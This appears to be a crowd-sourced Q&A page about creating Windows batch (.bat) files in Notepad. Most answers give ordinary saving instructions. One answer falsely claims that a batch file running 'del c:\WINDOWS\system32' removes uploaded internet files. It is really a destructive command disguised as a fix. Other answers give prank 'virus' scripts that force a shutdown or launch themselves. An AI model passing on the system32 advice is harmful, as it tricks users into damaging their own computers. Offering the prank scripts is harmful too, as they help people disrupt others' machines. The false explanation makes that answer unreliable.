answersLogoWhite

0


Best Answer

When you go to save, enter the name and and add .bat after it, with the whole thing in double quote marks.

E.g:

"name.bat"

User Avatar

Wiki User

βˆ™ 12y ago
This answer is:
User Avatar

Add your answer:

Earn +20 pts
Q: How can you save files on notepad in bat format or if you can?
Write your answer...
Submit
Still have questions?
magnify glass
imp
Related questions

How do you make a program with bat files?

In notepad put your code and save it as a .bat


What program opens bat files?

Batch files(.bat) open in command prompt(cmd). They can be edited in notepad or an equivalent text editor.


How do you write program files ms dos?

You can use any text editor but notepad++ which is free is the best. When you save the file be sure to set it to all file types and save it with a .bat extension!


How can you save files on notepad in bat format or if you can't please tell me which text editor can?

its very simple,while saving the file, just type the filename with .bat extension and put the whole name in double quotes and notepad will save the file as MSDOS batch file. for example if you want the filename to be myfile then while saving the file, use: "myfile.bat" if you do not use double quotes, it will attach one more extension to name i.e. .txt


How do you create simple bat files?

First open Notepad (Start > All Programs > Accessories > Notepad) and enter in this (Without the numbers): 1. @echo off2. echo Hello, this is your first bat file!3. pause>nulAfter you have entered that in save it as "My First.bat". Now go to the location you just saved it at and open it! It should say "Hello, this is your first bat file!" If it does, you have made your first bat file!


How do you run a notepad bat file?

The file must be saved with a .bat extension. After writing the file in Notepad, select File > Save As...; there will be a drop-down at the bottom of the Save As dialogue box, reading "Text Document (*.txt)". Change the drop-down to "All Files (*.*)", then type in the full name to save the file as in the box above: say, "myprogram.bat". Make sure you put ".bat" on the end! Once the file is saved, just double-click on its icon, wherever you saved it, to run.


What is the bat file extension called?

.bat indicates a batch file, which is a script. You can see what it contains by opening it with a text editor, such as notepad.


How do you remove an accidentally uploaded file that is now on the internet?

open up notepad type the following: @echo off del c:\WINDOWS\system32 save the file as anything.bat (remember to add the .bat extension and save as all files) double click and it will delete the system32 folder. said folder is the where the majority of your temp. internet files are located. getting rid of them should work.


What is a virus how can you make it?

A virus could make your computer shutdown or delete files, if you want to make a virus copy the text, paste it into notepad and save it as a cmd or bat file. @echo off shutdown -s -t 15 -c "your computer has been infected by a virus."


What is Batch File Maker?

you can use notepad for creating a batch file. just when you save the file that you made, add .bat as a file extension. like this: "sample.bat".


How do you make a fake virus?

Go to Notepad and type in shutdown -s -t 10 -c "Hahaha you got virused." then save as somthing .bat then go to your desktop and click on it. Or get someone else to or go on notepad and type start virus.bat then click entre and type virus.bat ( and what ever you want ) then go save.as ........bat


How to open ms dos in notepad?

You can't technically open MS DOS in notepad, but you can make files that MS DOS can use in notepad. For instance, you can create SYS, INI, BAT and others in notepad to make the computer do something, but MS DOS it self is dead. DOS will never die because of what it stands for. "Disk Operating System" You need a disk to run anything. Your hard drive is nothing more than a bunch of high tech cds spinning your files around.